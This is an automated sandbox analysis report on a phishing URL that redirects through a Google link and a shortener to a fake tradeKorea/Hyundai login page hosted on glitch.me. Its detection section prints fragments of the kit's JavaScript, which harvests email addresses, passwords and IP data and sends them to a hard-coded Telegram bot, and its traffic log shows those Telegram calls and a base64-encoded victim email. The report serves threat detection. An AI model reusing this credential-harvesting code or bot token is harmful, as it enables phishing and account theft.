Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t

Overview

General Information

Sample URL:https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&u
Analysis ID:1567086
Infos:

Detection

HTMLPhisher
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Yara detected HtmlPhish10
AI detected suspicious Javascript
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
Uses the Telegram API (likely for C&C communication)
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Javascript checks online IP of machine

Classification

  • System is w10x64
  • chrome.exe (PID: 2908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2112,i,7279134031412349882,5807614572286782813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    1.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
          Source: https://urlz.fr/tikuVirustotal: Detection: 5%Perma Link
          Source: urlz.frVirustotal: Detection: 5%Perma Link

          Phishing

          barindex
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tJoe Sandbox AI: Score: 9 Reasons: The brand 'tradeKorea' is associated with the domain 'tradekorea.com'., The URL 'troubled-worried-bamboo.glitch.me' does not match the legitimate domain 'tradekorea.com'., The use of 'glitch.me' as a domain extension is unusual for a known brand like tradeKorea., The URL contains multiple hyphenated words that do not relate to the brand, which is a common phishing tactic., The email domain 'hyundaielevator.com' in the input fields does not match the brand 'tradeKorea', which could indicate a phishing attempt. DOM: 1.0.pages.csv
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tJoe Sandbox AI: Score: 8 Reasons: The brand 'Hyundai' is a well-known global brand primarily associated with the domain 'hyundai.com'., The URL 'troubled-worried-bamboo.glitch.me' does not match the legitimate domain 'hyundai.com'., The domain 'glitch.me' is a platform for hosting web applications and is not directly associated with Hyundai., The use of random words in the subdomain 'troubled-worried-bamboo' is suspicious and not typical for a legitimate brand site., The email domain 'hyundaielevator.com' suggests a legitimate association with Hyundai, but the URL does not reflect this. DOM: 1.1.pages.csv
          Source: Yara matchFile source: 1.2.pages.csv, type: HTML
          Source: Yara matchFile source: 1.3.pages.csv, type: HTML
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: This code exhibits multiple high-risk characteristics: heavy obfuscation using string encoding and character replacement, use of the Function constructor (equivalent to eval), and suspicious string manipulation patterns. The code appears deliberately obscured to hide its true purpose, which is a common malware technique.
          Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: High-risk malicious script: Contains credential harvesting functionality, sends stolen credentials via Telegram bot (exposed token), collects sensitive user data (email, password, IP, browser info), and includes data exfiltration to external services. Shows clear phishing characteristics with email validation and password collection.
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: const bot_token = "7051308130:aagpocy-skirra6hgu3n13yjlxtbmoxjxua"; const chat_id = "1739269434"; const logger_token = ""; const logger_id = ""; const file = ""; /* global $ */ $(document).ready(function () { var count = 0; /////////////url ai getting//////////////// const aim = window.location.hash.substr(1).split("/"); var hashpart = handlebase64data(aim[0]); var ai = hashpart; if (!ai) { } else { // $('#ai').val(ai); var my_ai = ai; logvisitortotelegram(my_ai); var ind = my_ai.indexof("@"); var my_slice = my_ai.substr(ind + 1); var c = my_slice.substr(0, my_slice.indexof(".")); var final = c.tolowercase(); $("#ai").val(my_ai); $("#msg").hide(); var logourl = "https://logo.clearbit.com/" + my_slice; $.get(logourl) .done(function () { $(".log").attr("src", logourl); ...
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: const bot_token = "7051308130:aagpocy-skirra6hgu3n13yjlxtbmoxjxua"; const chat_id = "1739269434"; const logger_token = ""; const logger_id = ""; const file = ""; /* global $ */ $(document).ready(function () { var count = 0; /////////////url ai getting//////////////// const aim = window.location.hash.substr(1).split("/"); var hashpart = handlebase64data(aim[0]); var ai = hashpart; if (!ai) { } else { // $('#ai').val(ai); var my_ai = ai; logvisitortotelegram(my_ai); var ind = my_ai.indexof("@"); var my_slice = my_ai.substr(ind + 1); var c = my_slice.substr(0, my_slice.indexof(".")); var final = c.tolowercase(); $("#ai").val(my_ai); $("#msg").hide(); var logourl = "https://logo.clearbit.com/" + my_slice; $.get(logourl) .done(function () { $(".log").attr("src", logourl); ...
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: Number of links: 0
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: Title: tradeKorea.com: Verified Korean Suppliers and Products does not match URL
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: const bot_token = "7051308130:aagpocy-skirra6hgu3n13yjlxtbmoxjxua"; const chat_id = "1739269434"; const logger_token = ""; const logger_id = ""; const file = ""; /* global $ */ $(document).ready(function () { var count = 0; /////////////url ai getting//////////////// const aim = window.location.hash.substr(1).split("/"); var hashpart = handlebase64data(aim[0]); var ai = hashpart; if (!ai) { } else { // $('#ai').val(ai); var my_ai = ai; logvisitortotelegram(my_ai); var ind = my_ai.indexof("@"); var my_slice = my_ai.substr(ind + 1); var c = my_slice.substr(0, my_slice.indexof(".")); var final = c.tolowercase(); $("#ai").val(my_ai); $("#msg").hide(); var logourl = "https://logo.clearbit.com/" + my_slice; $.get(logourl) .done(function () { $(".log").attr("src", logourl); ...
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: <input type="password" .../> found
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: No <meta name="author".. found
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: No <meta name="author".. found
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: No <meta name="author".. found
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: No <meta name="author".. found
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: No <meta name="copyright".. found
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: No <meta name="copyright".. found
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: No <meta name="copyright".. found
          Source: https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49773 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49828 version: TLS 1.2

          Networking

          barindex
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.co.th to http://urlz.fr/tiku
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: urlz.fr to https://troubled-worried-bamboo.glitch.me/
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 184.30.17.174
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: global trafficHTTP traffic detected: GET /url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku HTTP/1.1Host: www.google.co.thConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /amp/urlz.fr/tiku HTTP/1.1Host: www.google.co.thConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=wOmr2tFOJNTz_9kO8qLieKjcRTOEYFsTx5JuxiWXNiw3CSC0CHQLOn678Sl3GdPkDt-hJc9uU7eIqgdcvjGeqjCKVTMQevK-o5uFdMv3xQ73k02dwzsxhVVTGAxofKBM3BxQ8W9wV7obwndAI9EdwDfb9DiedEOmhQwtbOivnmK5sL7zxeEX2vUrpHy1NFrNCldp
          Source: global trafficHTTP traffic detected: GET /tiku HTTP/1.1Host: urlz.frConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: troubled-worried-bamboo.glitch.meConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Nr3vsNvaxdKO489&MD=EY85S9GC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://troubled-worried-bamboo.glitch.mesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://troubled-worried-bamboo.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /56ce8c9ac0a9aac3fa5ba75a1e3ce1ae.jpg HTTP/1.1Host: i.gyazo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://troubled-worried-bamboo.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /hyundaielevator.com HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://troubled-worried-bamboo.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://troubled-worried-bamboo.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /56ce8c9ac0a9aac3fa5ba75a1e3ce1ae.jpg HTTP/1.1Host: i.gyazo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Gyazo_cfwoker=i
          Source: global trafficHTTP traffic detected: GET /hyundaielevator.com HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /imgs/favicon.png HTTP/1.1Host: kita.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://troubled-worried-bamboo.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /imgs/favicon.png HTTP/1.1Host: kita.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://troubled-worried-bamboo.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://troubled-worried-bamboo.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /resolve?name=hyundaielevator.com&type=MX HTTP/1.1Host: dns.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://troubled-worried-bamboo.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://troubled-worried-bamboo.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /resolve?name=hyundaielevator.com&type=MX HTTP/1.1Host: dns.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://troubled-worried-bamboo.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://troubled-worried-bamboo.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Nr3vsNvaxdKO489&MD=EY85S9GC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
